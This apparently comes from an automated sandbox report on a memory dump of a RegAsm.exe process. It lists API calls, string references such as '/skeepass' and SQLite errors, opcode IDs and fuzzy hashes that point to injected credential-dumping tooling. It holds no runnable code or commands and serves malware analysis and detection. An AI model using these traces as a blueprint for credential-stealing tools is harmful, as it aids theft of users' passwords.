                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                • API String ID: 2899246560-1542517562
                                                • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                APIs
                                                • memset.MSVCRT ref: 004091E2
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                • memcmp.MSVCRT ref: 004092D9
                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                • memcmp.MSVCRT ref: 0040933B
                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                • memcmp.MSVCRT ref: 00409411
                                                • memcmp.MSVCRT ref: 00409429
                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                • memcmp.MSVCRT ref: 004094AC
                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                • String ID:
                                                • API String ID: 3715365532-3916222277
                                                • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                • memset.MSVCRT ref: 004085CF
                                                • memset.MSVCRT ref: 004085F1
                                                • memset.MSVCRT ref: 00408606
                                                • strcmp.MSVCRT ref: 00408645
                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                • memset.MSVCRT ref: 0040870E
                                                • strcmp.MSVCRT ref: 0040876B
                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                • CloseHandle.KERNEL32(?), ref: 004087A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                • String ID: ---
                                                • API String ID: 3437578500-2854292027
                                                • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                APIs
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                • malloc.MSVCRT ref: 004186B7
                                                • free.MSVCRT ref: 004186C7
                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                • free.MSVCRT ref: 004186E0
                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                • malloc.MSVCRT ref: 004186FE
                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                • free.MSVCRT ref: 00418716
                                                • free.MSVCRT ref: 0041872A
                                                • free.MSVCRT ref: 00418749
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$FullNamePath$malloc$Version
                                                • String ID: |A
                                                • API String ID: 3356672799-1717621600
                                                • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                • API String ID: 2081463915-1959339147
                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                APIs
                                                • GetDC.USER32(00000000), ref: 004121FF
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                • String ID:
                                                • API String ID: 1700100422-0
                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                • String ID:
                                                • API String ID: 552707033-0
                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: %%0.%df
                                                • API String ID: 3473751417-763548558
                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                APIs
                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                • GetParent.USER32(?), ref: 00406136
                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                • String ID: A
                                                • API String ID: 2892645895-3554254475
                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                • API String ID: 4139908857-2887671607
                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                APIs
                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                • strchr.MSVCRT ref: 0040C140
                                                • strchr.MSVCRT ref: 0040C151
                                                • _strlwr.MSVCRT ref: 0040C15F
                                                • memset.MSVCRT ref: 0040C17A
                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                • String ID: 4$h
                                                • API String ID: 4019544885-1856150674
                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                • String ID: 0$6
                                                • API String ID: 4066108131-3849865405
                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                APIs
                                                • memset.MSVCRT ref: 004082EF
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                • memset.MSVCRT ref: 00408362
                                                • memset.MSVCRT ref: 00408377
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 290601579-0
                                                • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                APIs
                                                • memset.MSVCRT ref: 0040A47B
                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                • wcslen.MSVCRT ref: 0040A4BA
                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                • wcslen.MSVCRT ref: 0040A4E0
                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$_snwprintfmemset
                                                • String ID: %s (%s)$YV@
                                                • API String ID: 3979103747-598926743
                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                APIs
                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                • wcslen.MSVCRT ref: 0040A6B1
                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                • String ID: Unknown Error$netmsg.dll
                                                • API String ID: 2767993716-572158859
                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                APIs
                                                Strings
                                                • unable to open database: %s, xrefs: 0042F84E
                                                • database is already attached, xrefs: 0042F721
                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                • out of memory, xrefs: 0042F865
                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                • database %s is already in use, xrefs: 0042F6C5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                • API String ID: 1297977491-2001300268
                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                • wcslen.MSVCRT ref: 0040D1D3
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                • String ID: strings
                                                • API String ID: 3166385802-3030018805
                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                APIs
                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Library$FreeLoadMessage
                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                • API String ID: 3897320386-317687271
                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                APIs
                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                • memset.MSVCRT ref: 0041BA3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: -journal$-wal
                                                • API String ID: 438689982-2894717839
                                                • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                APIs
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: gj
                                                • API String ID: 438689982-4203073231
                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
